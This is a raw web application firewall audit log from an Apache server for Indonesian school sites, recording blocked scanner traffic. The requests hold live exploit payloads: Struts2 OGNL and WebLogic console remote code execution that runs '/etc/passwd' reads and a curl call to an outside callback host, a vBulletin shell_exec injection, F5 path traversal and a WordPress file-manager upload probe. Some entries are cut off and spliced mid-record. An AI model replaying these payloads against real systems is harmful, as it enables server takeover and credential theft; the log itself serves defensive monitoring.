"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748451089300088 2566 (- - -) Stopwatch2: 1748451089300088 2566; combined=1318, p1=505, p2=785, p3=0, p4=0, p5=28, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b9e7823-Z-- --0dc9dc19-A-- [28/May/2025:23:56:57 +0700] aDdAWRwBHP_x2VCWa06sbwAAAMQ 103.236.140.4 53090 103.236.140.4 8181 --0dc9dc19-B-- GET / HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Content-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())} Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165493369 --0dc9dc19-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0dc9dc19-H-- Message: Access denied with code 403 (phase 2). Match of "rx ^(?:\\w+\\/[\\w\\-\\.]+)(?:;(?:charset=[\\w\\-]{1,18}|boundary=[\\w\\-]+)?)?$" against "REQUEST_HEADERS:Content-Type" required. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "6743"] [id "243930"] [rev "2"] [msg "COMODO WAF: Remote code execution in Apache Struts versions 2.3.31 - 2.3.5 and 2.5 - 2.5.10 (CVE-2017-5638)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748451417213616 5026 (- - -) Stopwatch2: 1748451417213616 5026; combined=3274, p1=526, p2=2703, p3=0, p4=0, p5=45, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0dc9dc19-Z-- --bb236327-A-- [28/May/2025:23:56:57 +0700] aDdAWQ3r-0gDryHAyD_v2wAAAFQ 103.236.140.4 53104 103.236.140.4 8181 --bb236327-B-- GET /__ HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini X-Varnish: 169271521 --bb236327-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb236327-E-- --bb236327-H-- Message: Access denied with code 403 (phase 2). Pattern match "WriteFileC:\Windows\win.ini X-Varnish: 163570984 --f4dffd40-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4dffd40-E-- --f4dffd40-H-- Message: Access denied with code 403 (phase 2). Pattern match "system.multicallmethodNamewp.getUsersBlogsparamsrizalfadilrizalfadil& --5827871d-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --5827871d-E-- --5827871d-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748460337441158 6422 (- - -) Stopwatch2: 1748460337441158 6422; combined=4662, p1=482, p2=3930, p3=33, p4=40, p5=106, sr=81, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5827871d-Z-- --6d2e6a5b-A-- [29/May/2025:03:07:42 +0700] aDdtDuszXCullgn3bbHjiwAAAAc 103.236.140.4 53536 103.236.140.4 8181 --6d2e6a5b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 68.183.199.116 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 68.183.199.116 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --6d2e6a5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d2e6a5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748462862253350 849 (- - -) Stopwatch2: 1748462862253350 849; combined=332, p1=293, p2=0, p3=0, p4=0, p5=39, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d2e6a5b-Z-- --c04e375b-A-- [29/May/2025:03:09:38 +0700] aDdtghwBHP_x2VCWa061owAAAMY 103.236.140.4 53594 103.236.140.4 8181 --c04e375b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.159.85.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.159.85.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c04e375b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c04e375b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748462978927108 3547 (- - -) Stopwatch2: 1748462978927108 3547; combined=1650, p1=514, p2=1079, p3=0, p4=0, p5=57, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c04e375b-Z-- --ceab482e-A-- [29/May/2025:03:21:07 +0700] aDdwM31Ye2lUDKzW1LvDHgAAABg 103.236.140.4 53886 103.236.140.4 8181 --ceab482e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 179.49.185.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 179.49.185.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ceab482e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ceab482e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748463667291985 2769 (- - -) Stopwatch2: 1748463667291985 2769; combined=1167, p1=430, p2=704, p3=0, p4=0, p5=32, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ceab482e-Z-- --13febb3b-A-- [29/May/2025:03:47:12 +0700] aDd2UP4vV4CoZ0MKLMPcnQAAAI0 103.236.140.4 54710 103.236.140.4 8181 --13febb3b-B-- POST /mifs/.;/services/LogService HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 6 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0 Content-Type: x-application/hessian X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168343337 --13febb3b-C-- cH --13febb3b-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --13febb3b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=x-application/hessian"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748465232709885 5179 (- - -) Stopwatch2: 1748465232709885 5179; combined=3225, p1=841, p2=2286, p3=29, p4=36, p5=33, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13febb3b-Z-- --e385f91b-A-- [29/May/2025:03:47:13 +0700] aDd2Uf4vV4CoZ0MKLMPcowAAAJQ 103.236.140.4 54748 103.236.140.4 8181 --e385f91b-B-- POST /console/css/%252e%252e%252fconsole.portal HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 1258 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Content-Type: application/x-www-form-urlencoded cmd: curl d0rjil9gpeoh536h8tf0ox3hqwjr3uy7s.oast.live X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 70943545 --e385f91b-C-- _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); --e385f91b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e385f91b-E-- --e385f91b-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\b(?:cmd(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:32){0,1}\\.exe\\b)|(?:ftp|n(?:c|et|map)|rcmd|telnet|w(?:guest|sh))\\.exe\\b)" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "60"] [id "211200"] [rev "3"] [msg "COMODO WAF: System Command Access||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: cmd.exe found within ARGS:handle: com.tangosol.coherence.mvel2.sh.shellsession(weblogic.work.executethread executethread =(weblogic.work.executethread) thread.currentthread() weblogic.work.workadapter adapter = executethread.getcurrentwork() java.lang.reflect.field field = adapter.getclass().getdeclaredfield(connectionhandler) field.setaccessible(true) object obj = field.get(adapter) weblogic.servlet.internal.servletrequestimpl req =(weblogic.servlet.internal.servletrequestimpl) obj.getclas..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748465233747077 2954 (- - -) Stopwatch2: 1748465233747077 2954; combined=924, p1=523, p2=367, p3=0, p4=0, p5=33, sr=84, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e385f91b-Z-- --f89fb07b-A-- [29/May/2025:03:47:22 +0700] aDd2WsX5pbyFXv2T3ipXGwAAANI 103.236.140.4 54778 103.236.140.4 8181 --f89fb07b-B-- POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 140 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/129.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 70943560 --f89fb07b-C-- subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" --f89fb07b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f89fb07b-E-- --f89fb07b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ajax/render/widget_tabbedcontainer_tab_panel"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748465242413387 2579 (- - -) Stopwatch2: 1748465242413387 2579; combined=652, p1=435, p2=186, p3=0, p4=0, p5=30, sr=74, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f89fb07b-Z-- --ceb78b38-A-- [29/May/2025:03:47:22 +0700] aDd2Wv4vV4CoZ0MKLMPcpwAAAIE 103.236.140.4 54782 103.236.140.4 8181 --ceb78b38-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 608 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 167280706 --ceb78b38-C-- --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" 17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd" upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target" l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]" 1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain poc-test --------------------------ca81ac1fececda48-- --ceb78b38-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ceb78b38-E-- --ceb78b38-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748465242419660 4028 (- - -) Stopwatch2: 1748465242419660 4028; combined=2683, p1=377, p2=2278, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ceb78b38-Z-- --6aec164b-A-- [29/May/2025:04:28:22 +0700] aDd_9mMaQtTb69S13pjxbgAAAEI 103.236.140.4 57024 103.236.140.4 8181 --6aec164b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 7 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --6aec164b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6aec164b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748467702122801 894 (- - -) Stopwatch2: 1748467702122801 894; combined=366, p1=321, p2=0, p3=0, p4=0, p5=44, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6aec164b-Z-- --9d679409-A-- [29/May/2025:04:33:06 +0700] aDeBEsX5pbyFXv2T3ipYDQAAAME 103.236.140.4 57176 103.236.140.4 8181 --9d679409-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (ZZ; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160924303 --9d679409-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9d679409-E-- --9d679409-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748467986200855 2258 (- - -) Stopwatch2: 1748467986200855 2258; combined=608, p1=454, p2=112, p3=0, p4=0, p5=42, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d679409-Z-- --388f9f7c-A-- [29/May/2025:04:33:17 +0700] aDeBHX1Ye2lUDKzW1LvE8wAAAA8 103.236.140.4 57180 103.236.140.4 8181 --388f9f7c-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (ZZ; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 83001966 --388f9f7c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --388f9f7c-E-- --388f9f7c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748467997577241 2638 (- - -) Stopwatch2: 1748467997577241 2638; combined=675, p1=506, p2=135, p3=0, p4=0, p5=34, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --388f9f7c-Z-- --7460113f-A-- [29/May/2025:04:43:58 +0700] aDeDnn1Ye2lUDKzW1LvFFQAAAA8 103.236.140.4 57578 103.236.140.4 8181 --7460113f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 5.161.120.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 5.161.120.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7460113f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7460113f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748468638055085 2591 (- - -) Stopwatch2: 1748468638055085 2591; combined=1406, p1=488, p2=888, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7460113f-Z-- --9780e451-A-- [29/May/2025:04:45:25 +0700] aDeD9WMaQtTb69S13pjxvAAAAFg 103.236.140.4 57622 103.236.140.4 8181 --9780e451-B-- POST /console/css/%252e%252e%252fconsole.portal HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1258 User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded cmd: curl d0rjil9gpeoh536h8tf0nq8rs3ff3fokx.oast.live X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 83002158 --9780e451-C-- _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); 